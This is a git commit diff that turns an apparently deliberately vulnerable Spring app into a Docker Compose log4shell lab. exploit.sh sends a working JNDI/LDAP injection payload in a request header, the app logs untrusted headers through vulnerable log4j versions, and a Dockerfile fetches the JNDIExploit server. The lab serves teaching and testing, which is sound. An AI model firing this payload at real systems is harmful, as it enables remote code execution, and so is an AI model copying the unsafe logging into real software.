Update to create a full lab environment with docker compose
This commit is contained in:
parent
2414dc4300
commit
68e0adaa66
6
Dockerfile-exploit
Normal file
6
Dockerfile-exploit
Normal file
|
@ -0,0 +1,6 @@
|
|||
FROM debian:stretch
|
||||
EXPOSE 8080
|
||||
ADD exploit.sh .
|
||||
RUN apt-get -y update && apt-get -y install wait-for-it curl
|
||||
CMD ["wait-for-it", "app:8080", "-t", "10", "--", "bash", "exploit.sh"]
|
||||
|
6
Dockerfile-jndi
Normal file
6
Dockerfile-jndi
Normal file
|
@ -0,0 +1,6 @@
|
|||
FROM openjdk:8u181-jdk-alpine
|
||||
EXPOSE 8888
|
||||
EXPOSE 1389
|
||||
RUN mkdir /app
|
||||
RUN cd /app && wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip && unzip JNDIExploit.v1.2.zip
|
||||
CMD ["java", "-jar", "/app/JNDIExploit-1.2-SNAPSHOT.jar", "-i", "jndi", "-p", "8888"]
|
11
README.md
11
README.md
|
@ -8,17 +8,12 @@ It uses Log4j 2.14.1 (through `spring-boot-starter-log4j2` 2.6.1) and the JDK 1.
|
|||
|
||||
## Running the application
|
||||
|
||||
Run it:
|
||||
Run a complete security lab environment for log4shell:
|
||||
|
||||
```bash
|
||||
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
|
||||
docker-compose up
|
||||
```
|
||||
|
||||
Build it yourself (you don't need any Java-related tooling):
|
||||
|
||||
```bash
|
||||
docker build . -t vulnerable-app
|
||||
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
|
||||
```
|
||||
|
||||
## Exploitation steps
|
||||
|
@ -73,4 +68,4 @@ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/
|
|||
## Contributors
|
||||
|
||||
[@christophetd](https://twitter.com/christophetd)
|
||||
[@rayhan0x01](https://twitter.com/rayhan0x01)
|
||||
[@rayhan0x01](https://twitter.com/rayhan0x01)
|
||||
|
|
|
@ -17,7 +17,9 @@ dependencies {
|
|||
exclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'
|
||||
}
|
||||
implementation 'org.springframework.boot:spring-boot-starter-log4j2:2.6.1'
|
||||
testImplementation 'org.springframework.boot:spring-boot-starter-test'
|
||||
// https://mvnrepository.com/artifact/log4j/log4j
|
||||
implementation group: 'log4j', name: 'log4j', version: '1.2.16'
|
||||
testImplementation 'org.springframework.boot:spring-boot-starter-test'
|
||||
}
|
||||
|
||||
test {
|
||||
|
|
31
docker-compose.yml
Normal file
31
docker-compose.yml
Normal file
|
@ -0,0 +1,31 @@
|
|||
version: "3.9" # optional since v1.27.0
|
||||
services:
|
||||
jndi:
|
||||
build:
|
||||
context: .
|
||||
dockerfile: Dockerfile-jndi
|
||||
ports:
|
||||
- "8888:8888"
|
||||
- "1389:1389"
|
||||
app:
|
||||
build: .
|
||||
ports:
|
||||
- "8080:8080"
|
||||
volumes:
|
||||
- tmp:/tmp
|
||||
links:
|
||||
- jndi
|
||||
depends_on:
|
||||
- jndi
|
||||
exploit:
|
||||
build:
|
||||
context: .
|
||||
dockerfile: Dockerfile-exploit
|
||||
volumes:
|
||||
- tmp:/tmp
|
||||
depends_on:
|
||||
- app
|
||||
- jndi
|
||||
|
||||
volumes:
|
||||
tmp:
|
12
exploit.sh
Normal file
12
exploit.sh
Normal file
|
@ -0,0 +1,12 @@
|
|||
#!/bin/bash
|
||||
curl app:8080 -H 'X-Api-Version: ${jndi:ldap://jndi:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
|
||||
sleep 5
|
||||
|
||||
filename=/tmp/pwned
|
||||
if [ -f "$filename" ];
|
||||
then
|
||||
echo "Regrettably, you've been pwned :("
|
||||
echo "This configuration is vulnerable to log4shell"
|
||||
else
|
||||
echo "It looks like you're safe!"
|
||||
fi
|
|
@ -1,6 +1,7 @@
|
|||
package fr.christophetd.log4shell.vulnerableapp;
|
||||
|
||||
|
||||
import org.springframework.beans.factory.annotation.Value;
|
||||
import org.springframework.web.bind.annotation.GetMapping;
|
||||
import org.springframework.web.bind.annotation.RequestHeader;
|
||||
import org.springframework.web.bind.annotation.RestController;
|
||||
|
@ -11,12 +12,20 @@ import org.apache.logging.log4j.Logger;
|
|||
@RestController
|
||||
public class MainController {
|
||||
|
||||
private static final Logger logger = LogManager.getLogger("HelloWorld");
|
||||
private static final org.apache.log4j.Logger logger1 = org.apache.log4j.Logger.getLogger("HelloWorld1");
|
||||
private static final Logger logger2 = LogManager.getLogger("HelloWorld2");
|
||||
|
||||
@Value("${log4j.version:2}")
|
||||
private String log4j_version;
|
||||
|
||||
@GetMapping("/")
|
||||
public String index(@RequestHeader("X-Api-Version") String apiVersion) {
|
||||
logger.info("Received a request for API version " + apiVersion);
|
||||
return "Hello, world!";
|
||||
if ("1".equals(log4j_version)) {
|
||||
logger1.info("Hello from log4j v1 " + apiVersion);
|
||||
} else {
|
||||
logger2.info("Received a request for API version using log4j v2 " + apiVersion);
|
||||
}
|
||||
return "Hello, world!";
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
package fr.christophetd.log4shell.vulnerableapp;
|
||||
|
||||
import org.apache.log4j.BasicConfigurator;
|
||||
import org.springframework.boot.SpringApplication;
|
||||
import org.springframework.boot.autoconfigure.SpringBootApplication;
|
||||
|
||||
|
@ -7,7 +8,8 @@ import org.springframework.boot.autoconfigure.SpringBootApplication;
|
|||
public class VulnerableAppApplication {
|
||||
|
||||
public static void main(String[] args) {
|
||||
SpringApplication.run(VulnerableAppApplication.class, args);
|
||||
BasicConfigurator.configure();
|
||||
SpringApplication.run(VulnerableAppApplication.class, args);
|
||||
}
|
||||
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue
Block a user